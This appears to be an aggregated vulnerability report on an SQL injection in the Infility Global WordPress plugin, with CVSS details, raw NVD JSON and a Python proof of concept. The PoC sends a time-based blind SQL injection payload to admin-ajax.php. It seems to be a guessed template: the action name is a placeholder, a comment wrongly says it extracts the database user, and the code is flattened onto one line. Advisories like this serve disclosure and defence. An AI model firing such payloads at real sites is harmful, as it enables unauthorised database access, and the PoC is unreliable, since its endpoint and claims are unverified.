Security Vulnerability Report
中文
CVE-2025-68865 CVSS 9.3 CRITICAL

CVE-2025-68865

Published: 2026-01-05 11:17:42
Last Modified: 2026-04-28 19:36:03

Description

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Infility Infility Global infility-global allows SQL Injection.This issue affects Infility Global: from n/a through <= 2.15.06.

CVSS Details

CVSS Score
9.3
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L

Configurations (Affected Products)

No configuration data available.

Infility Global <= 2.15.06 (WordPress插件)
Infility Global 从 n/a 到 2.15.06

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-68865 SQL Injection PoC for Infility Global WordPress Plugin # Target: WordPress site with Infility Global plugin <= 2.15.06 target_url = "http://target-site.com/wp-admin/admin-ajax.php" # Blind SQL Injection payload to extract database version def sql_injection_test(target): headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'Content-Type': 'application/x-www-form-urlencoded', } # Payload extracts database user() via time-based blind injection # Modify the parameter name and endpoint based on actual vulnerable endpoint payload = "1' AND (SELECT * FROM (SELECT SLEEP(5))a) AND '1'='1" params = { 'action': 'infility_global_action', # Example action parameter 'param': payload } try: print(f"[*] Testing target: {target}") print(f"[*] Payload: {payload}") response = requests.get(target, params=params, headers=headers, timeout=10) if response.elapsed.total_seconds() >= 5: print("[+] Vulnerability confirmed! Time-based blind SQL injection works.") return True else: print("[-] No response delay detected.") return False except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return False if __name__ == "__main__": if len(sys.argv) > 1: target_url = sys.argv[1] sql_injection_test(target_url)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68865", "sourceIdentifier": "[email protected]", "published": "2026-01-05T11:17:42.267", "lastModified": "2026-04-28T19:36:02.633", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Infility Infility Global infility-global allows SQL Injection.This issue affects Infility Global: from n/a through <= 2.15.06."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/infility-global/vulnerability/wordpress-infility-global-plugin-2-14-38-sql-injection-vulnerability?_s_id=cve", "source": "[email protected]"}]}}